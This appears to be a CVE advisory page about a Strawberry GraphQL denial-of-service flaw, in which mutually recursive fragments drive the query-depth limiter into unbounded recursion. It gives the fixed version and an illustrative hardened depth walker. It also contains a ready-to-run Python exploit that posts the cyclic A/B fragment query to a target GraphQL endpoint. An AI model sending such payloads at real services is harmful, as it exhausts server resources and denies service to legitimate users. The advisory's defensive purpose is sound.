The QueryDepthLimiter extension in Strawberry GraphQL does not detect cycles when it follows GraphQL fragment spreads. The `determine_depth` function in `query_depth_limiter.py` recursively resolves each `FragmentSpreadNode` it encounters without keeping track of the fragments it has already entered on the current expansion path. A crafted query whose fragments reference each other circularly (fragment A spreads fragment B, and fragment B spreads fragment A) therefore drives the depth limiter into unbounded recursion.
The recursion never terminates on its own; it ends only when the call stack exceeds the Python interpreter's recursion limit (1000 frames by default) and a RecursionError is raised, which aborts validation. Because the depth limiter runs as a validation rule, the query never reaches execution, so nothing that lives in resolvers (authentication, per-field authorization, rate limiting) gets a chance to reject it. The GraphQL specification's own validation rule against fragment cycles (NoFragmentCyclesRule in graphql-core) does not prevent this either, since the depth limiter walks the fragments itself rather than relying on that rule's result. Each such request costs the attacker one small POST and costs the server a full walk to the recursion limit plus an error path; repeating it burns CPU and ties up worker threads or processes, a cheap application-level Denial of Service (DoS). The vulnerability affects Strawberry GraphQL from 0.71.0 up to and including 0.315.6 and is fixed in 0.315.7, where QueryDepthLimiter tracks visited fragments and aborts the recursion when a cycle is detected.
DailyCVE Form:
Platform: Strawberry GraphQL
Version: 0.71.0-0.315.6
Vulnerability: Uncontrolled recursion
Severity: Medium (5.3)
Date: 2026-06-04
Prediction: 2026-06-04
What Undercode Say:
Verify vulnerable version
pip show strawberry-graphql | grep Version
Version: 0.315.6
Exploit simulation using Python
python3 -c "
import httpx
# Mutually recursive fragments: A spreads B and B spreads A.
# Assumes the target schema exposes a User type and a root 'user' field.
payload = {'query': '''
fragment A on User { ...B }
fragment B on User { ...A }
query { user { ...A } }
'''}
try:
    # A RecursionError raised during validation typically surfaces as an
    # HTTP 500 rather than a client-side exception, so inspect the response.
    r = httpx.post('http://target/graphql', json=payload, timeout=10)
    print(f'HTTP {r.status_code}: {r.text[:200]}')
except httpx.HTTPError as e:
    print(f'Request failed, server may be unresponsive: {e}')
"
Exploit:
The exploit is a single GraphQL query that defines two mutually recursive fragments and spreads one of them from a root operation. `determine_depth` follows A into B and B back into A with no record of the fragments it has already entered, so the recursion continues until the interpreter's recursion limit is hit.
Protection:
Upgrade to Strawberry GraphQL version 0.315.7 or later. The patch adds a visited set to the depth calculation, breaking recursion upon detecting a circular fragment reference.
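To make the mechanism described above and the shape of the fix under Protection concrete, here is an added example written for this page; it is not Strawberry's own `determine_depth`, whose exact code is not reproduced here. It is a small walker over a constructed GraphQL document that computes query depth by following fragment spreads. With `detect_cycles=False` it behaves like the vulnerable versions, following every spread unconditionally, so the A/B query from this page recurses until Python's recursion limit; with the default `detect_cycles=True` it keeps the chain of fragments currently being expanded and aborts on a repeat. The minimal parser, the sample documents, the `FragmentCycleError` name and the path-based (rather than global) visited tracking are all this example's own assumptions.

```python
"""Fragment-cycle handling in a GraphQL query-depth walker: vulnerable vs. hardened.
Illustrative example written for this page, not Strawberry's own code."""
import sys

# Constructed sample documents (not captured from any real target).
CYCLIC_QUERY = """
fragment A on User { ...B }
fragment B on User { ...A }
query { user { ...A } }
"""

SAFE_QUERY = """
fragment A on User { name friends { ...B } }
fragment B on User { name }
query GetUser { user { ...A } }
"""

# A "diamond": two fragments share a third. Not a cycle, and must not be rejected.
DIAMOND_QUERY = """
fragment Base on User { id }
fragment A on User { ...Base }
fragment B on User { ...Base }
query { user { ...A ...B } }
"""


class FragmentCycleError(Exception):
    """Raised by the hardened walker when a fragment spreads itself, directly or indirectly."""


def parse_document(text):
    """Minimal parser for the GraphQL subset used here (fields, selection sets, named
    fragments, fragment spreads; no arguments, directives or inline fragments).
    Returns ({operation_name: selections}, {fragment_name: selections}), where a
    selection is ('field', name, sub_selections) or ('spread', fragment_name)."""
    toks = text.replace("{", " { ").replace("}", " } ").split()
    pos = 0

    def parse_selection_set():
        nonlocal pos
        if toks[pos] != "{":
            raise ValueError(f"expected '{{' at token {pos}, got {toks[pos]!r}")
        pos += 1
        selections = []
        while toks[pos] != "}":
            tok = toks[pos]
            pos += 1
            if tok.startswith("..."):
                selections.append(("spread", tok[3:]))
            else:
                sub = parse_selection_set() if pos < len(toks) and toks[pos] == "{" else []
                selections.append(("field", tok, sub))
        pos += 1  # consume the closing '}'
        return selections

    operations, fragments = {}, {}
    while pos < len(toks):
        kw = toks[pos]
        if kw == "fragment":  # fragment Name on Type { ... }
            name = toks[pos + 1]
            pos += 4
            fragments[name] = parse_selection_set()
        elif kw in ("query", "mutation", "subscription"):
            pos += 1
            name = "anonymous"
            if toks[pos] != "{":
                name = toks[pos]
                pos += 1
            operations[name] = parse_selection_set()
        elif kw == "{":  # query shorthand
            operations["anonymous"] = parse_selection_set()
        else:
            raise ValueError(f"unexpected token {kw!r}")
    return operations, fragments


def selection_depth(selections, fragments, path=(), detect_cycles=True):
    """Depth of a selection set = number of nested field levels.
    `path` is the chain of fragments currently being expanded. With
    detect_cycles=False the walker behaves like the vulnerable determine_depth:
    every spread is followed unconditionally, so A -> B -> A recurses until the
    interpreter's recursion limit and raises RecursionError."""
    depth = 0
    for sel in selections:
        if sel[0] == "field":
            _, _, sub = sel
            d = 1 + selection_depth(sub, fragments, path, detect_cycles) if sub else 1
        else:
            frag = sel[1]
            if frag not in fragments:
                raise ValueError(f"unknown fragment {frag!r}")
            if detect_cycles:
                if frag in path:  # the fix: a fragment already on the path is a cycle
                    raise FragmentCycleError("cycle: " + " -> ".join(path + (frag,)))
                d = selection_depth(fragments[frag], fragments, path + (frag,), detect_cycles)
            else:
                d = selection_depth(fragments[frag], fragments, path, detect_cycles)
        depth = max(depth, d)
    return depth


def query_depths(text, detect_cycles=True):
    """Depth of every operation in the document (the limiter computes one per operation)."""
    operations, fragments = parse_document(text)
    return {name: selection_depth(sels, fragments, (), detect_cycles) for name, sels in operations.items()}


def probe(text, detect_cycles=True):
    """Run the walker and summarise the outcome so both behaviours can be compared."""
    try:
        return "depth=" + str(max(query_depths(text, detect_cycles).values()))
    except (RecursionError, FragmentCycleError) as exc:
        return type(exc).__name__


if __name__ == "__main__":
    print("recursion limit:", sys.getrecursionlimit())
    for label, doc in [("cyclic", CYCLIC_QUERY), ("safe", SAFE_QUERY), ("diamond", DIAMOND_QUERY)]:
        print(f"{label:8} vulnerable -> {probe(doc, detect_cycles=False):18} hardened -> {probe(doc)}")
```

Run it as a script to see the three outcomes side by side. The visited set here is the chain of fragments on the current path rather than a single global set: the diamond document spreads `Base` twice through different fragments, which is legal and must still be measured, while A -> B -> A must be rejected. Whether Strawberry's patch tracks visited fragments per path or globally is not stated on this page.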
Impact:
An unauthenticated attacker can send the malicious query repeatedly; every request drives validation into a RecursionError before any resolver runs, consuming CPU and worker capacity and denying service to legitimate users for as long as the flood continues. The attack needs minimal bandwidth and no privileges, making it a low-cost availability vector.
Sources:
Reported By: github.com

